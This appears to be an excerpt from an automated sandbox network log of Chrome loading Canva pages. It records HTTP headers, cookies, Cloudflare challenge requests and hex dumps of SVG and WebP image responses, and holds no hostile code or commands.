                                                                                                                                                                                                                                                                    Age: 1055340
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "0483f2b648dcc986d01385062052ae1c"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Thu, 22 Aug 2024 01:18:08 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 23 Aug 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: xeTx9lA9amwqbH5jjDVeVXloY7Ex6jZEUcXdx9yDq3h/7bU2UJe8XkXADOF2ZvoF0qVNGdnR+dg=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: FSG4RK5H2Q8YM4X8
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: AhYdWN.s3rGHhicTCPUHIrYI2qLxhFbr
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 66 67 38 30 43 34 51 56 25 32 46 4b 63 31 43 63 39 4d 66 6a 70 6b 62 4f 38 68 72 4d 45 76 43 65 55 31 35 4a 74 75 25 32 46 64 45 56 41 51 58 6e 57 51 57 39 5a 48 7a 45 38 42 43 66 79 67 32 34 69 51 59 35 61 4c 32 48 4d 41 56 4c 61 4d 62 52 73 67 42 6c 57 33 46 4e 47 4d 33 56 76 25 32 42 43 74 32 50 71 33 64 65 53 4f 31 74 36 6b 4e 63 33 46 69 72 25 32 46 32 31 6e 74 5a 67 54 39 6f 58 54 46 59 42 4a 54 36 69 37 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fg80C4QV%2FKc1Cc9MfjpkbO8hrMEvCeU15Jtu%2FdEVAQXnWQW9ZHzE8BCfyg24iQY5aL2HMAVLaMbRsgBlW3FNGM3Vv%2BCt2Pq3deSO1t6kNc3Fir%2F21ntZgT9oXTFYBJT6i7Q%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC368INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 44 44 32 45 34 34 22 20 64 3d 22 4d 33 35 2e 38 38 35 20 31 31 2e 38 33 33 63 30 2d 35 2e 34 35 2d 34 2e 34 31 38 2d 39 2e 38 36 38 2d 39 2e 38 36 37 2d 39 2e 38 36 38 2d 33 2e 33 30 38 20 30 2d 36 2e 32 32 37 20 31 2e 36 33 33 2d 38 2e 30 31 38 20 34 2e 31 32 39 2d 31 2e 37 39 31 2d 32 2e 34 39 36 2d 34 2e 37 31 2d 34 2e 31 32 39 2d 38 2e 30 31 37 2d 34 2e 31 32 39 2d 35 2e 34 35 20 30 2d 39 2e 38 36 38 20 34 2e 34 31 37 2d 39 2e 38 36 38 20 39 2e 38 36 38 20 30 20 2e 37 37 32 2e 30 39 38 20 31 2e 35 32 2e 32 36 36 20 32 2e 32 34 31 43 31
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#DD2E44" d="M35.885 11.833c0-5.45-4.418-9.868-9.867-9.868-3.308 0-6.227 1.633-8.018 4.129-1.791-2.496-4.71-4.129-8.017-4.129-5.45 0-9.868 4.417-9.868 9.868 0 .772.098 1.52.266 2.241C1


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    99192.168.2.1249824104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1281OUTGET /cdn-cgi/challenge-platform/h/b/jsd/r/8e5950c0ed99c334 HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC599INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    allow: POST
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cieGLFt6H7sZRhPwYowh1Q7hyn5s1wR%2FHkRpNjolTj8PPDVJjl4ZM3SUWQexkojioKzqEqqofInGo1xBKIaAKigDKoJKfTvrHx5r2nk9rS1vU0x70fx4fs8CH1AE5V4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 8e59513e19288c36-EWR


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    100192.168.2.1249826104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC1333OUTGET /web/images/e5c5a4d109aeb5234e4405032dfd4800.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1187INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 470
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e3e840cf1-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 809385
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "e5c5a4d109aeb5234e4405032dfd4800"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Fri, 13 Sep 2024 01:54:33 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sun, 14 Sep 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: 4wQTx1HF4OFU8sya2S9lGbwYv0iutGJjAYSx1rNw6E0YMlOU3BXz5G/JAJG2R2k1Pp+lOLkOegM=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: 0MKV62DE80HMRVQH
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 8S.pPh6KDLDLZ9gqa0n.3_HnZ1cHr38g
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 46 59 63 63 73 53 25 32 46 7a 42 35 6c 6c 67 41 4f 53 52 69 57 47 38 54 4d 62 77 7a 52 75 6d 73 6b 49 72 4b 30 4f 4f 57 72 77 50 73 64 67 70 55 49 59 52 65 56 34 72 4a 45 4b 47 79 4f 6d 25 32 46 71 62 48 44 36 6d 4f 78 42 59 32 32 71 39 4d 6d 4f 61 36 70 39 49 44 66 7a 25 32 46 57 78 39 4d 32 4f 4c 56 69 35 43 73 77 39 4d 75 47 6e 63 67 77 50 61 5a 77 65 41 6e 6d 66 38 62 30 56 6b 62 4f 4d 77 6d 37 59 52 59 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYccsS%2FzB5llgAOSRiWG8TMbwzRumskIrK0OOWrwPsdgpUIYReV4rJEKGyOm%2FqbHD6mOxBY22q9MmOa6p9IDfz%2FWx9M2OLVi5Csw9MuGncgwPaZweAnmf8b0VkbOMwm7YRY%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC470INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 41 43 33 33 22 20 64 3d 22 4d 32 37 2e 32 38 37 20 33 34 2e 36 32 37 63 2d 2e 34 30 34 20 30 2d 2e 38 30 36 2d 2e 31 32 34 2d 31 2e 31 35 32 2d 2e 33 37 31 4c 31 38 20 32 38 2e 34 32 32 6c 2d 38 2e 31 33 35 20 35 2e 38 33 34 61 31 2e 39 37 20 31 2e 39 37 20 30 20 30 20 31 2d 32 2e 33 31 32 2d 2e 30 30 38 20 31 2e 39 37 31 20 31 2e 39 37 31 20 30 20 30 20 31 2d 2e 37 32 31 2d 32 2e 31 39 34 6c 33 2e 30 33 34 2d 39 2e 37 39 32 2d 38 2e 30 36 32 2d 35 2e 36 38 31 61 31 2e 39 38 20 31 2e 39 38 20 30 20 30 20 31 2d 2e 37 30 38 2d 32 2e 32
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFAC33" d="M27.287 34.627c-.404 0-.806-.124-1.152-.371L18 28.422l-8.135 5.834a1.97 1.97 0 0 1-2.312-.008 1.971 1.971 0 0 1-.721-2.194l3.034-9.792-8.062-5.681a1.98 1.98 0 0 1-.708-2.2


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    101192.168.2.1249829104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC942OUTGET /v2/image-resize/format:PNG/height:831/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:1600?csig=AAAAAAAAAAAAAAAAAAAAAIeRpJCdaNjD5eFqoIZKm5NiX2vhXgUuA39yzwgWYvzu&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAIh84Mq_eVXBwPrghDB-WvEJm2_Tf6oLeXfO68GWCD7S&signer=media-rpc&x-canva-quality=screen_2x HTTP/1.1
                                                                                                                                                                                                                                                                    Host: media.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e18908c54-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 5810
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 13:24:57 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept, Origin
                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    Cf-Bgj: imgq:85,h2pri
                                                                                                                                                                                                                                                                    Cf-Polished: origFmt=png, origSize=71565
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_media
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    x-request-id: 8e58c3624c948ccd
                                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=M8px63OEtWAVjzJ3XfPnD9cFZjMl0VdLG6u8yUmP62k-1732114907-1.0.1.1-EJ.4nkqHtz46h5_MGUq3zzEWmlb2yQeYF8lp39MYEynTA41nJxfOGeS8U.axNU9WapKuorrygtfEYkVOewksqQ; path=/; expires=Wed, 20-Nov-24 15:31:47 GMT; domain=.canva.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC507INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 68 46 6b 4d 47 66 41 44 4d 65 25 32 46 76 73 5a 43 50 76 7a 48 62 50 32 61 56 4b 66 4c 51 31 47 25 32 42 47 50 69 4d 50 51 4a 5a 56 50 69 35 6f 77 62 4f 64 72 4e 32 31 6e 50 4f 44 68 63 32 74 79 41 7a 4e 63 30 30 61 52 6b 6e 5a 62 4b 45 31 79 73 31 44 79 30 43 76 6e 54 66 4e 6a 4c 36 6c 59 44 67 78 6e 38 45 71 41 31 31 45 5a 58 49 4b 58 4d 72 6c 6b 59 56 73 61 70 43 44 34 78 64 55 76 63 36 75 6e 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hFkMGfADMe%2FvsZCPvzHbP2aVKfLQ1G%2BGPiMPQJZVPi5owbOdrN21nPODhc2tyAzNc00aRknZbKE1ys1Dy0CvnTfNjL6lYDgxn8EqA11EZXIKXMrlkYVsapCD4xdUvc6unw%3D%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1025INData Raw: 34 64 35 65 0d 0a 52 49 46 46 5c 91 00 00 57 45 42 50 56 50 38 4c 50 91 00 00 2f 3f 86 cf 00 55 8f e3 b6 91 1c 49 c3 fc b3 5e ef ef 7e 11 31 01 fd b5 c7 a1 c7 74 de 71 e4 11 9d 11 21 12 22 29 bb e6 e4 5d 5a 09 95 19 54 d8 cb 39 37 5c 72 4c 27 63 f5 41 6b 67 fa 39 c2 3b 6d db 7a 49 6e fe 13 a7 cc 4c c5 cc cc 4c cb 20 96 96 c5 cc cc cc cc cc cc cc cc cc 0c bb db 41 9f ee 39 e7 ec e9 de d9 d2 39 fa 8c 11 33 8b db 24 6a 33 47 ec 63 fc 19 32 e6 54 cc 1c 71 34 1b 29 33 f4 98 61 a3 36 e3 0a 23 47 a7 cc b4 91 39 5a 31 46 5d ab d8 cc bf 12 7d a6 08 c5 8a 4c 62 45 66 d8 48 0c a1 aa a6 a6 36 dd c8 cc d8 86 29 47 47 91 99 99 b6 26 32 46 3d a1 4a 19 4e 29 d2 13 99 69 d6 cc 5b 35 16 46 8a cd 6c 51 38 bd a6 90 49 d1 96 99 a1 d7 cc cc de aa ad 36 64 38 25 8c 4c 6b 45 e6
                                                                                                                                                                                                                                                                    Data Ascii: 4d5eRIFF\WEBPVP8LP/?UI^~1tq!")]ZT97\rL'cAkg9;mzInLL A993$j3Gc2Tq4)3a6#G9Z1F]}LbEfH6)GG&2F=JN)i[5FlQ8I6d8%LkE
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff 8d ff bd dd 3c a0 94 16 05 99 43 a4 b4 42 c1 e5 c4 e4 57 3b a1 29 9b e8 e4 27 32 67 29 e7 84 e7 6c e2 93 6f ae 18 9a 2f a0 a0 72 53 2b 86 21 9e 9f 07 bd 5f bb 2c d2 b0 68 8a d9 88 68 fd 32 35 26 3a fa c3 5b 02 7f 34 87 41 c1 e5 86 7e 7d 34 6c b5 69 3f 34 ee 53 8a d9 84 8e 8d b5 63 d3 a2 fd 32 c7 a8 0e 0d 64 a3 a0 72 43 bb 3c ea b7 f3 b7 77 4b 53 ca d9 75 9f 9a 71 d2 8f ea ec 9b d9 47 75 7c 4b 00 b2 51 a8 86 6e e8 78 1f fd 36 7b 5f cc d1 77 b3 57 4d 00 b2 51 c8 86 7e 56 47 df eb ad af e6 70 ab 26 00 d9 28 54 43 bf aa bd af f5 de 8f 7a eb 6b 75 f4 bd de 47 75 78 4b 00 b2 51 a8 86 be 99 2d 3c cd 12 77 54 ff df 12 80 5c 14 64 ae 9b 9a 9a f0 63 4a d8 84 4f ef d1 1d 27 a7 ff
                                                                                                                                                                                                                                                                    Data Ascii: <CBW;)'2g)lo/rS+!_,hh25&:[4A~}4li?4Sc2drC<wKSuqGu|KQnx6{_wWMQ~VGp&(TCzkuGuxKQ-<wT\dcJO'
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 39 e5 d5 20 84 44 76 7b 45 73 2f 0c 15 80 f0 67 01 42 22 bb bd a2 b9 17 86 08 10 aa e8 bf 42 80 90 28 6e af 28 ad 30 34 40 0b 52 48 14 57 2a 4a 2b 0c d5 80 90 28 ae 54 94 16 b2 01 21 51 5c a9 28 74 03 42 a2 b8 52 51 5a c8 06 84 44 f1 07 0e 37 d6 23 4c 55 c8 06 24 44 f1 07 16 0e 3b d6 41 ff 84 2a fa af 50 32 40 88 e2 91 a5 72 98 7d 7d 88 32 05 fb 43 f8 b3 48 be 10 93 5c 7d da 21 d8 a9 5e d1 7a 44 83 fb 89 29 ae f6 6a af 60 a6 fe 79 05 77 f2 a9 28 79 08 f1 b0 87 64 b5 5e 51 ea 11 0d ea d7 1c 86 63 5d c9 4e 2e c0 3f 77 32 ff 37 2f 23 24 a6 8a 69 d4 49 fd 22 f5 88 d6 2b aa 60 7e b9 74 b4 c6 0d 2f c9 3f b7 3e cb c3 f6 ca ca bb a6 d2 55 4d 9d d7 23 5a af 68 30 bf 6c ce f7 3e 3a 9c 9d 7f f6 38 74 ef b0 d0 32 43 dc 7f d7 9c 34 a6 a9 ab 6e ec bc 1e d1 06 9d 04 8f
                                                                                                                                                                                                                                                                    Data Ascii: 9 Dv{Es/gB"B(n(04@RHW*J+(T!Q\(tBRQZD7#LU$D;A*P2@r}}2CH\}!^zD)j`yw(yd^Qc]N.?w27/#$iI"+`~t/?>UM#Zh0l>:8t2C4n
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 47 b9 56 2d db ac a1 c0 2d 67 31 ed 94 e9 01 d8 98 2f eb ef 2a 8d 31 46 77 77 6f 4d 0d 13 f1 12 94 4c b0 8a 50 b1 da 70 c6 11 c4 f9 7f 9e c6 18 a3 8c 65 5e f4 ea 23 d9 37 e3 18 4f c4 a6 9a f9 26 ab a0 0a 46 b9 6a c8 f0 40 7f 70 a6 0e b3 57 7e 3c c6 e8 4d 6d 13 3f 22 4c 42 b9 df a4 13 63 8c a6 6d 7d b5 91 bc 6d 42 c7 e7 df a6 9a 0d 5e d5 ca f4 1d a4 14 89 85 a7 89 63 20 50 5e 74 73 33 c7 85 d1 37 f9 99 10 01 61 ac 27 e2 39 af 39 92 6e 5d ef 01 2d 23 2c b7 89 1f b1 58 ee 37 8d 13 63 6c f5 91 ac ad a9 e3 f2 31 ae bc ae 58 b2 83 02 fd 06 34 73 c5 00 57 96 9d b1 90 80 0f 10 c4 79 cf 99 39 6e 34 6b ff 7f 56 55 24 07 cd cf 1f c0 78 1b 67 1c c2 be ef ed 4d d2 b8 ad 94 ea 03 b8 1f 3f ce cf cd b4 b2 dd bd c9 2f 1e ee 1f 23 8e 74 80 d5 9e 36 6e 6c 77 2b 02 38 4c 40
                                                                                                                                                                                                                                                                    Data Ascii: GV--g1/*1FwwoMLPpe^#7O&Fj@pW~<Mm?"LBcm}mB^c P^ts37a'99n]-#,X7cl1X4sWy9n4kVU$xgM?/#t6nlw+8L@
